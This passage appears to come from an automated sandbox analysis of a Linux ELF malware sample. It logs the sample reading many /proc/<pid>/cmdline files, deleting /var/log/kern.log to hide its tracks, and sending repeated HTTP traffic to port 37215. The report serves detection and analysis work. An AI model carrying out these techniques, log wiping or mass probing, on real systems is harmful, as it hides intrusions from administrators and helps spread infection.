                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/21/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/3407/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/22/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/23/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/24/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/25/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/26/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/27/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/28/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/29/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1484/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/490/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/250/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/130/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/251/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/131/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/132/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/133/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1479/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/378/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/258/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/259/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/931/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1595/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/812/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/933/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/30/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/3419/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/35/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/3310/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/260/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/261/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/262/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/142/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/263/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/264/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/265/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/145/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/266/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/267/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/268/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/3303/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/269/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1486/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/1806/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/3668/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/3440/cmdlineJump to behavior
                Source: /tmp/WIwTo1UTMq.elf (PID: 5529)File opened: /proc/270/cmdlineJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: /tmp/WIwTo1UTMq.elf (PID: 5531)Log files deleted: /var/log/kern.logJump to behavior
                Source: unknownNetwork traffic detected: HTTP traffic on port 53840 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45884 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44406 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56802 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50724 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48976 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33114 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40700 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42330 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51590 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37716 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47718 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39876 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37370 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37094 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37242 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38516 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38494 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43240 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55412 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59960 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60248 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45972 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55860 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35202 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51354 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59772 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51484 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37812 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46172 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47726 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46688 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38984 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54202 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49092 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37816 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44616 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36994 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53240 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36858 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48610 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48270 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41604 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52838 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39182 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57192 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35580 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42566 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57736 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49132 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45270 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41060 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59738 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51760 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51934 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56730 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58488 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43790 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42956 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47498 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53646 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39470 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45838 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45118 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51144 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54740 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35146 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58670 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43642 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46624 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48602 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56274 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60020 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50678 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37412 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54552 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59276 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56174 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49120 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47378 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35720 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60956 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45156 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56208 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60700 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53334 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53312 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40324 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44838 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55948 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40738 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40810 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38850 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55404 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49070 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55986 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39856 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50666 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55052 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35256 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37064 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38512 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60478 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60884 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56226 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33476 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39180 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43328 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59606 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34962 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58530 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40758 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54124 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51200 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52598 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55460 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52438 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56024 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33256 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37602 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59600 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59548 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56580 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57460 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52340 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35352 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45464 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41528 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48798 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53276 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59572 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56840 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39034 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60618 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57270 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48372 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37074 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47232 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42424 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35734 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54560 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43478 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40974 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59310 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39762 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34038 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42792 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45746 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38458 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46866 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55950 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54418 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50884 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52296 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41692 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47796 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35388 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39850 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38686 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51932 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51974 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43692 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53444 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40582 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54158 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47546 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45806 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48720 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45520 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53650 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48258 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42592 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52526 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46272 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43424 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45774 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44786 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50894 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52422 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47652 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46342 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52884 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47268 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56630 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35542 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51338 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35754 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59282 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41628 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53334 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57436 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47736 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35848 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35034 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50588 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60430 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55536 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41216 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57346 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42852 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44784 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43516 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43852 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48400 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50860 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60820 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47404 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48886 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51776 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59822 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35312 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57856 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57262 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56136 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55216 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59836 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55902 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51960 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47492 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43680 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56010 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41920 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54358 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48912 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56052 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56968 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33968 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49372 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53246 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34214 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40956 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59010 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34212 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58886 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37408 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53242 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42210 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60390 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34694 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47970 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43034 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33422 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59980 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55316 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57548 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56022 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47494 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35342 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36998 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59912 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59146 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47300 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56522 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57892 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60458 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36638 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46328 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58180 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45354 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38714 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52480 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45248 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51826 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33270 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52178 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45506 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41598 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58532 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53974 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55488 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39188 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60578 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52288 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57546 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57546 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52288 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60578 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55488 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39188 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53974 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45506 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58532 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52178 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41598 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33270 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45248 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51826 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46368 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57546 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58532 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45506 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58722 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39188 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53974 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55488 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41598 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33270 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52178 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51826 -> 37215
